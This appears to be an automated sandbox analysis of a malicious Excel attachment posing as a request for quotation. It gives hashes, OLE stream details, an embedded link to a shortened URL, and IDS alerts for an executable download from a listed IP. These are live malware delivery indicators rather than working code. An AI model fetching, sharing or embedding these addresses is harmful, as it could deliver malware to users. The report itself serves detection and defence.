                    SHA1:CB1E33D16F4384BCCE3F650C2F531C901D130414
                    SHA-256:0417419921C78EB4A44383E71235C72BE8592C8A8CDD84F1163AF57C8A812A68
                    SHA-512:F325688B05CB9E164A0CD6578F92B4C86C3787D9C8663F3BBB518C1A9D525AD9567BDE78BAE4648CF786C8837AA05207E17C9BBD1B41484EBE5E63371545F92C
                    Malicious:true
                    Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 02:51:49 2024, Security: 1
                    Entropy (8bit):7.978643312871792
                    TrID:
                    • Microsoft Excel sheet (30009/1) 47.99%
                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                    File name:RFQ#51281AOLAI.xls
                    File size:1'155'072 bytes
                    MD5:114f2dfd11f6d21eddaf6162cb818ac2
                    SHA1:48d1cd6e1945d794b8eea48094de07f3d77c169a
                    SHA256:fcfabaaf9a5b228727840c434c7192369cd82f115fbe29dade21dc6c722eddd0
                    SHA512:06f26fbe9b4c17296b0eb1271fcc3dfcbe3280f5dde9ecc9ca6ca96afca03e018bba7fb0687c051a6a5fde990d4c039c0f8be7df82f22d0f7389c5f00c81c8cf
                    SSDEEP:24576:yZwsLEh7JvrW42STWET0i9CaIw2qelci6OUTmyZ6hAPu:yysK7VW42SjldSy4AP
                    TLSH:1D3523B1FE638E9BE0075B3848DBA71302A4FDE2EE81851B1794770E693AB75354342D
                    File Content Preview:........................>...................................d...................................................g.......h.......j.......l.......n..............................................................................................................

                    File Icon

                    Icon Hash:276ea3a6a6b7bfbf

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "RFQ#51281AOLAI.xls"

                    Indicators
                    Has Summary Info:
                    Application Name:Microsoft Excel
                    Encrypted Document:True
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:True
                    Summary
                    Code Page:1252
                    Author:
                    Last Saved By:
                    Create Time:2006-09-16 00:00:00
                    Last Saved Time:2024-07-26 01:51:49
                    Creating Application:Microsoft Excel
                    Security:1
                    Document Summary
                    Document Code Page:1252
                    Thumbnail Scaling Desired:False
                    Contains Dirty Links:False
                    Shared Document:False
                    Changed Hyperlinks:False
                    Application Version:786432

                    Streams with VBA

                    VBA File Name: Sheet1.cls, Stream Size: 977
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                    VBA File Name:Sheet1.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 a8 08 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    VBA Code
                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                    VBA File Name: Sheet2.cls, Stream Size: 977
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                    VBA File Name:Sheet2.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 ba 3c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    VBA Code
                    Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                    VBA File Name: Sheet3.cls, Stream Size: 977
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                    VBA File Name:Sheet3.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T 4 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 34 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    VBA Code
                    Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                    VBA File Name: ThisWorkbook.cls, Stream Size: 985
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                    VBA File Name:ThisWorkbook.cls
                    Stream Size:985
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 1d 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    VBA Code
                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                    Streams

                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                    General
                    Stream Path:\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.25248375192737
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:244
                    Entropy:2.889430592781307
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                    General
                    Stream Path:\x5SummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:200
                    Entropy:3.282068105701866
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ( ` . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                    Stream Path: MBD001BDE15/\x1CompObj, File Type: data, Stream Size: 99
                    General
                    Stream Path:MBD001BDE15/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:99
                    Entropy:3.631242196770981
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: MBD001BDE15/Package, File Type: Microsoft Excel 2007+, Stream Size: 569795
                    General
                    Stream Path:MBD001BDE15/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:569795
                    Entropy:7.972309072920344
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: MBD001BDE16/\x1Ole, File Type: data, Stream Size: 352
                    General
                    Stream Path:MBD001BDE16/\x1Ole
                    CLSID:
                    File Type:data
                    Stream Size:352
                    Entropy:6.486914378277046
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . d . G . a . . . . 0 o Y . ' q N . 5 . . . 8 , 2 . K ) N % v . . . @ k z . 3 8 R 7 g . I + P M - . $ . P ( P . . . j h " K . t . . 7 i w . g > A ; c . ] , h . ' s ] . J b - \\ V = j b . * V . H $ { ! . n + % w - e j } P s G } M } . . Q . ~ i " . . . . . . . . . . . . . . . . . . . . Z . b . u . 0 . E . . . E v . 3 ( k ^ | z . E . ` \\ M
                    Data Raw:01 00 00 02 f5 7f a1 1b 12 aa 06 73 00 00 00 00 00 00 00 00 00 00 00 00 f4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f0 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 64 00 47 00 61 00 00 00 d9 1b 30 6f 59 1d 27 71 4e bd 84 1d ff 35 a4 96 aa 1f f4 00 c2 bd 38 c8 2c 32 c8 dd 7f c8 ce ed 4b 29 8a b2 4e a6 8e 25 c0 76
                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 562218
                    General
                    Stream Path:Workbook
                    CLSID:
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:562218
                    Entropy:7.999418476587462
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . | . . z . g ( R * ^ ' ^ Q V # @ \\ 6 . . . . . . . . . . . . \\ . p . ? E < & d + . . t % . C V @ " 0 o [ c . . M { w ? . X n t 3 2 . . . . . 7 . [ ' & z ^ . @ . @ ; w . . . } # _ . B . . . \\ N a . . . g K . . . = . . . F ^ e > . . . . q K 1 o | . " . . . . > c . . . . . . . . . . . . . . . . . . B . . . T = . . . . q x t . 4 @ . . . E . . . " . . . < . . . . . o . . . { . . . . 1 . . . E @ . . N . 3 . . $ { i . a . E z b 1 . . . . . . L . @ 7 w . L >
                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 15 e1 fb fb bc ab 1b f2 7c 11 de 97 98 7a 93 9d ef 03 9b 67 28 eb 52 2a e4 db 5e 27 5e de e0 d1 51 fc 56 ab 98 23 cc 40 d2 cb f0 5c 92 36 05 e1 00 02 00 b0 04 c1 00 02 00 a8 17 e2 00 00 00 5c 00 70 00 86 3f 45 c1 3c f3 99 26 85 e1 64 b8 cd 2b c3 db 0f ad 1e 74 25 82 89 9e e6 b3 ad 43 aa 56
                    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                    General
                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                    CLSID:
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:523
                    Entropy:5.211133089273723
                    Base64 Encoded:True
                    Data ASCII:I D = " { 4 A C A F 9 D F - 9 D 0 6 - 4 9 C C - 9 4 8 2 - 0 2 6 2 8 1 5 2 3 1 F D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 2 6 0 8 1 1 3 D 5 1 7 D 5 1 7 D
                    Data Raw:49 44 3d 22 7b 34 41 43 41 46 39 44 46 2d 39 44 30 36 2d 34 39 43 43 2d 39 34 38 32 2d 30 32 36 32 38 31 35 32 33 31 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                    General
                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                    CLSID:
                    File Type:data
                    Stream Size:104
                    Entropy:3.0488640812019017
                    Base64 Encoded:False
                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                    CLSID:
                    File Type:data
                    Stream Size:2644
                    Entropy:4.005444285593956
                    Base64 Encoded:False
                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                    CLSID:
                    File Type:data
                    Stream Size:553
                    Entropy:6.371567531783539
                    Base64 Encoded:True
                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 92 f7 b3 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-26T12:42:50.732149+0200TCP2022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M18049168104.219.239.104192.168.2.22
                    2024-07-26T12:42:50.904584+0200TCP2022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M28049168104.219.239.104192.168.2.22

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 12:42:40.660958052 CEST4916380192.168.2.22188.114.96.3
                    Jul 26, 2024 12:42:40.667100906 CEST8049163188.114.96.3192.168.2.22
                    Jul 26, 2024 12:42:40.667187929 CEST4916380192.168.2.22188.114.96.3
                    Jul 26, 2024 12:42:40.667469978 CEST4916380192.168.2.22188.114.96.3
                    Jul 26, 2024 12:42:40.672297955 CEST8049163188.114.96.3192.168.2.22
                    Jul 26, 2024 12:42:41.799470901 CEST8049163188.114.96.3192.168.2.22
                    Jul 26, 2024 12:42:41.799576044 CEST4916380192.168.2.22188.114.96.3
                    Jul 26, 2024 12:42:41.806514978 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:41.813082933 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:41.813164949 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:41.813411951 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:41.819470882 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.343767881 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.343827963 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.343863964 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.343976974 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344010115 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344024897 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344026089 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344043970 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344059944 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344059944 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344080925 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344090939 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344127893 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344558001 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344592094 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344616890 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344628096 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.344640017 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.344680071 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.350455046 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.350599051 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.350661993 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.351217985 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.351272106 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.451380014 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.451402903 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.451420069 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.451436043 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.451453924 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.451489925 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.451489925 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.456099987 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.456135988 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.456182003 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.456193924 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.456921101 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.456957102 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.456979990 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.457000971 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.460978031 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.461024046 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.461045027 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.461065054 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.461745024 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.461781979 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.461800098 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.461816072 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.461837053 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.461857080 CEST4916480192.168.2.22104.219.239.104
                    Jul 26, 2024 12:42:42.466032028 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.466082096 CEST8049164104.219.239.104192.168.2.22
                    Jul 26, 2024 12:42:42.466093063 CEST4916480192.168.2.22104.219.239.104
